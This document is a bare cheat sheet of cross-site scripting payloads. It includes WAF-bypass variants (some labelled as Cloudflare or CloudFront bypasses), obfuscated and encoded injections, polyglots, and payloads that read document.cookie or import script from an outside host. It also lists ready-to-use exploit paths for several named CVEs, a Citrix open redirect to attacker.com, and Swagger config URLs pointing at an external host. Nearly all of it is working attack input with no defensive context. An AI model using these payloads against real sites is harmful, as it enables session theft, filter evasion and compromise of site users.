XSS Payloads

Open Redirect to XSS

Swagger XSS

Polyglots XSS

CVEs

Tricks

1--><Svg%0COnLoad=(confirm)(1)>
<svg only=1 onload=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg onload=alert(document.cookie)>
<svg/oNLY%3d1/**/On+ONLoaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
<Svg Only=1 OnLoad=confirm(atob("MQ=="))>
<svg onload='new Function*["Y000!"].find(al\u0065rt)*'>
<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162'] ('\141\154\145\162\164\50\61\51')()">
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/>

<h1 onmouseover="alert(1)">TESTTTTT</h1>
<h1 onauxclick=confirm``>RIGH-CLICK-HERE
<h1 onwheel="alert('Wheel scrolled!')">Scroll the mouse wheel here</h1>
<h2 onpointerrawupdate="prompt``">test</h1>

<script /*%00*/>/*%00*/prompt``/*%00*/</script /*%00*/
<script x='a@b'a> y='a@b'//a@b%0A\u0061lert``</script x>
<!--><script>alert(1)</script>
1"*%2Fconfirm%0B(1)<%2FScript%2F--><Script>%2F*
1")AutoFocus/ContentEditable/OnFocusIn=(confirm)(1)//


<body oNpagEshoW=(confirm)(1)>
<body onpageshow="alert(1)">

<input type="checkbox" id="z" value="y" style="display:none" &%2362;="" onchange="top[['alert'][0]](location.hostname);this.remove()"><label for="z" style="position:fixed;inset:0;cursor:crosshair"></label>
<input type="hidden" oncontentvisibilityautostatechange="alert(1)" style="content-visibility:auto">
<input name=tset autofocus %26%23x3e%3b%20 onfocus=alert(1)>
<input type="password" id="CF-bypaSS" name="query" value="" onfocus="alert('1')" autofocus="" />

<details x=xxxXxXXXXXXXXXXXXXXXXXXXXXXXXKXXXXXXXXXXX 2 Open ontoggle=ka(alert(origin))>
<details/open/ontoggle=confirm('XSS')>
<details open ontoggle="(()=>confirm`1`)()">
<details open ontoggle='let x=`javascri`;let y=`pt:aler`;let z=`t()`;let a=x+y+z;location=a'><summary>Click Me</summary></details>

<img src onerror='let x=`javascri`;let y=`pt:aler`;let z=`t()`;let a=x+y+z;location=a'>
1'"><%0AImg Src=On%0AXSS On%0AError=alert(1)>
1")--><Title/</Style/</Textarea/</Iframe/<Img/Src/OnError=(confirm)(1)//
<Img Src=//X55.is OnLoad%0C=import(Src)>
<img src="/" =_=" title="onerror='prompt(1)'">
<img/src=x/onerro=6><img/src="1"/onerror=alert(1);>
<img src=x onerror=window.onerror=alert;throw'1'>
<img/src=="x onerror=alert(1)//">
"%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//>
"><img/src/onerror=.1|alert``>
%3cimg%2fsrc%2fonerror%3dalert%2f%2f%26NewLine%3b(2)%3e
%3cImg%20Src%3dOnXSS%20OnError%3dconfirm(1337)%3e
<Img Src=OnXSS OnError=confirm(1337)>
<image onerror=alert() src>
<img usemap=#x style=position:fixed;inset:0;width:100%;height:100%><map name=x><area coords=",,9999,9999" href=javascript:alert(0)>
<img+src%3Dx+onerror%3D"%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041">

"><img/src/x/onerror="...">


1"-->'<A HRef=//X55.is AutoFocus OnFocus=(confirm)(1)><Base K='
<A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
<a href="%09jav%09ascript:parent[['al','ert'].join('')](origin)">click</a>
</<a/href="><svg/onload=alert(45)>">

<iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'>
<form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
<frameset onpageshow="alert(1)">
<video><source onerror="alert(1)">
<textarea autofocus onfocus="a=eval;b=alert;a(b(/g/.source));">
<code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOUSE HERE</code>
<div autofocus contenteditable onfocus=alert(1)>
<object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">
<meta http-equiv=refresh content=0,#x id=x onbeforematch=alert() hidden=until-found>
<buggedout ContentEditable AutoFocus OnFocus=alert(1)>
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+['b','c','d'][0]]('YWxlcnQoKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1</div></address>
<0 name="<svg/onload=alert()>">
" onfocus="alert(1)" autofocus="

javascript:/*test*/alert(1)
javascript:eval("alert(1)")
javascript:(Function("alert(1)"))()
javascript:(new Function("alert(1)"))()
javascript:\u0061lert(1)
javascript:window
javascript:\u0061\u006c\u0065\u0072\u0074(1)
javascript%3A%28new%20Function%28%27ale%27%2B%27rt%281%29%27%29%29%28%29
%6a%61%76%61%73%63%72%69%70%74:alert(1)
java%0d%0ascript%0d%0a:alert(0)
javascript://%250Aalert(1)
%09Jav%09ascript:alert(document.domain)
%19Jav%09asc%09ript:https%20://whitelisted.com/%250Aconfirm%25281%2529
javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
javascript:'a'.replace.call`1${/./}${alert}`
javascript:'a'.replace(/./,alert)
javascript:'a,'.replace`a${alert}`

?url=https://jumpy-floor.surge.sh/test.yaml
?configUrl=https://jumpy-floor.surge.sh/test.json

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

CVE-2025-0133
/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=<svg xmlns%3D"http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg"><script>prompt("XSS")<%2Fscript><%2Fsvg>&domain=(empty_domain)&computer=computer
--------------------------------------------------------------------------------------------------------------------------------
CVE-2023-29489
/cpanelwebcall/<img src=x onerror="prompt%28document.domain%29">TESTER
--------------------------------------------------------------------------------------------------------------------------------
Citrix XSS + open redirect
/oauth/idp/logout?post_logout_redirect_uri=attacker.com
/oauth/idp/logout?post_logout_redirect_uri=%0d%0a%0d%0a<script>alert(document.cookie)</script>
--------------------------------------------------------------------------------------------------------------------------------
CVE-Elementor
/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9Cg==
--------------------------------------------------------------------------------------------------------------------------------

{alert`1`}
(alert)`1`
setTimeout`alert\`1\``
(1).constructor.constructor('al'+'ert(1)')()


# also:    top | window | self

parent[['al','ert'].join('')](1)
parent[/al/.source.concat(/ert/.source)](2)
parent[[/al/.source,/ert/.source].join('')](2)
parent[`${/al/.source}${/ert/.source}`](2)
parent['\x61\x6c\x65\x72\x74'](1)
parent[/*foo*/'confirm'/*bar*/](window)
parent[8680439..toString(30)](1)